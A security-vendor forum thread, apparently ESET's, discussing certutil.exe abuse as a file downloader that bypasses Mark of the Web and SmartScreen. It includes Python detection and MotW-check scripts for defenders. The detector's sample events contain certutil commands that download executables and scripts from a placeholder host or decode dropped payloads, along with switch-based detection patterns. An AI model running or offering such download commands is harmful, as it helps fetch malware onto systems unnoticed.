  • Administrators

ESET will not block powershell, java.exe, certutil.exe or whatever script interpreter or legitimate application just because it can be used to download both legit and malicious files. If the downloaded file was malicious, there's a very good chance it would be detected by ESET.

Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance.


The certutil.exe abuse shown in the YouTube video is detailed here: https://bdure.medium.com/lets-defend-suspicious-certutil-exe-usage-eventid-113-93e379611663 .

Also, the attack has been well known for some time:

Quote

In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsvr32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.

This is not completely surprising since certutil has remote capabilities, but it's clearly not checking the format of the file, effectively turning certutil into a LoL-ware version of curl.

As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time.

So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.

https://www.varonis.com/blog/the-malware-hiding-in-your-windows-system32-folder-part-iii-certutil-and-alternate-data-streams

Eset could create an internal HIPS rule to scan for such command line usage of certutil.exe.

Edited by itman
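An added example, not from itman's post and not ESET's HIPS rule: the kind of command-line check the post above is asking for, run over a few constructed Sysmon Event ID 1 style records (Image plus CommandLine). It flags certutil only when a fetch switch (-urlcache or -verifyctl) is paired with a URL, or when a -decode/-encode transform is used, and ignores housekeeping such as a bare "certutil -urlcache" or "certutil -store". The sample events, hostnames and file names are made up for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed sample process-creation events in the shape of Sysmon Event ID 1
# (Image, CommandLine). Made up for this example, not real telemetry.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -split -f http://example.test/payload.exe C:\Users\Public\payload.exe"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil /urlcache /f https://example.test/a.ps1 a.ps1"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -decode C:\Users\Public\blob.txt C:\Users\Public\out.exe"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -verifyctl -f -split http://example.test/bad.exe"),
    (r"C:\Windows\System32\certutil.exe", r"certutil -store my"),                              # benign
    (r"C:\Windows\System32\certutil.exe", r"certutil -hashfile C:\tools\setup.msi SHA256"),     # benign
    (r"C:\Windows\System32\certutil.exe", r"certutil -urlcache"),                              # benign: lists the cache, fetches nothing
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /c echo certutil -urlcache -f"),                # not certutil: keyed on Image, not on text
]

# Switches that make certutil fetch a remote resource, and switches that turn a
# dropped base64/hex blob back into a binary.
FETCH_SWITCHES = {"urlcache", "verifyctl"}
TRANSFORM_SWITCHES = {"decode", "decodehex", "encode", "encodehex"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


@dataclass
class Finding:
    image: str
    command_line: str
    reason: str
    url: Optional[str]


def image_basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def switches(command_line: str) -> set:
    """Normalise '-urlcache' and '/urlcache' to the bare switch name, lower-case."""
    return {tok[1:].lower() for tok in command_line.split() if len(tok) > 1 and tok[0] in "-/"}


def classify(image: str, command_line: str) -> Optional[Finding]:
    """Return a Finding for abusive certutil use, or None for anything else."""
    if image_basename(image) != "certutil.exe":
        return None
    sw = switches(command_line)
    match = URL_RE.search(command_line)
    url = match.group(0) if match else None
    fetch = sorted(sw & FETCH_SWITCHES)
    if fetch and url:  # a fetch switch with no URL (plain -urlcache) is housekeeping, not a download
        extras = sorted(sw & {"f", "split"})
        reason = "remote download via -" + fetch[0] + (" with -" + " -".join(extras) if extras else "")
        return Finding(image, command_line, reason, url)
    transform = sorted(sw & TRANSFORM_SWITCHES)
    if transform:
        return Finding(image, command_line, "payload transform via -" + transform[0], None)
    return None


def scan(events: Iterable[Tuple[str, str]]) -> List[Finding]:
    return [f for f in (classify(img, cl) for img, cl in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.reason:45} url={str(f.url):35} {f.command_line}")
```

The check keys on the Image path rather than on the text "certutil" in the command line, so a cmd.exe that merely echoes the string is not flagged; the flip side is that a renamed copy of certutil.exe would slip past it, which is why a production rule would also look at Sysmon's OriginalFileName field from the PE version resource.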

1 hour ago, Marcos said:

Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance.

Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.


  • Administrators
8 minutes ago, itman said:

Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.


Yes, if the downloaded file was malicious I'd expect it to be detected.


1 hour ago, Marcos said:

Yes, if the downloaded file was malicious I'd expect it to be detected.

Which means if the file was 0-day malware, you're nailed.


Using one of the LOLBins Project examples for certutil.exe, I ran it as a standard user from a command prompt. It ran without issue:

Of note is that the downloaded file had no MotW status associated with it. This means it would not be Microsoft Defender cloud scanned. Also, no SmartScreen detection. The only thing displayed was a UAC alert to elevate to admin, since the .exe is an installer, with the alert noting untrusted publisher status:

Edited by itman
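An added example, not part of itman's post: a check for the Mark of the Web the post says was missing. It reads the file's NTFS Zone.Identifier alternate data stream (what a browser writes on download and what certutil does not), parses the ZoneId, and says whether SmartScreen would look at the file. The Zone.Identifier sample, hostnames and the temporary file are constructed for the example; opening "<path>:Zone.Identifier" only works on NTFS, and the code treats any failure to open it as "no mark".

```python
import configparser
import os
import tempfile
from typing import Optional

# Constructed Zone.Identifier stream, in the form a browser writes it to
# <file>:Zone.Identifier on NTFS when it saves a download. Made up for this example.
BROWSER_ADS = (
    "[ZoneTransfer]\n"
    "ZoneId=3\n"
    "ReferrerUrl=https://example.test/\n"
    "HostUrl=https://example.test/setup.exe\n"
)

ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}


def parse_zone_id(ads_text: str) -> Optional[int]:
    """Return the ZoneId from Zone.Identifier content, or None if it is not a valid stream."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(ads_text.replace("\r\n", "\n"))
        return cp.getint("ZoneTransfer", "ZoneId")
    except (configparser.Error, ValueError):
        return None


def read_motw(path: str) -> Optional[int]:
    """ZoneId stored in the file's Zone.Identifier stream, or None when it is absent.
    The '<path>:Zone.Identifier' syntax only works on NTFS; anywhere else the
    OSError is treated as 'no mark', which is also what a certutil download looks like."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_id(fh.read())
    except OSError:
        return None


def describe(zone: Optional[int]) -> str:
    """Explain what a given ZoneId (or its absence) means for SmartScreen."""
    if zone is None:
        return "no Mark of the Web: SmartScreen and MotW-gated cloud scanning are skipped"
    name = ZONE_NAMES.get(zone, "unknown")
    if zone >= 3:  # Internet (3) and Restricted Sites (4) are the zones SmartScreen keys on
        return f"ZoneId={zone} ({name}): SmartScreen will evaluate this file on launch"
    return f"ZoneId={zone} ({name}): treated as local, no SmartScreen prompt"


def check_file(path: str) -> str:
    return describe(read_motw(path))


if __name__ == "__main__":
    # A file written locally, as certutil does, carries no Zone.Identifier stream.
    with tempfile.NamedTemporaryFile("wb", suffix=".exe", delete=False) as tmp:
        tmp.write(b"MZ")
    try:
        print(tmp.name, "->", check_file(tmp.name))
    finally:
        os.unlink(tmp.name)
    print("browser download ->", describe(parse_zone_id(BROWSER_ADS)))
```

On a Windows box the same check can be done by hand with PowerShell's Get-Item -Stream Zone.Identifier; the point of the script is that the absence of the stream, not the presence of a malicious byte pattern, is what lets a certutil download bypass the MotW-gated checks the post describes.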

3 hours ago, czesetfan said:

Doesn't this current testing just point to the questions in this topic? 

As far as malware-sourced LOLBin use observed on their honeypot (I assume) for March (?):

what                          count
cmd.exe                        3609
svchost.exe                    2154
sc.exe                          765
rundll32.exe                    747
iexplore.exe                    735
tor.exe                         718
consent.exe                     630
schtasks.exe                    563
wmiprvse.exe                    363
PhoneExperienceHost.exe        357
powershell.exe                 296
reg.exe                        153
wscript.exe                    129
taskkill.exe                   103
msbuild.exe                     80
ping.exe                        56
control.exe                     40
wmic.exe                        40
csc.exe                         26
regsvr32.exe                    16
dism.exe                        15
conhost.exe                     13
taskhost.exe                    13
net1.exe                         8
attrib.exe                       5
msiexec.exe                      5
certutil.exe                     4
mshta.exe                        2
cscript.exe                      1

No indication of how many of these samples, if any, were used in the March test. BTW - ESSP and Panda were the only tested products that missed a tested malware sample.

Edited by itman
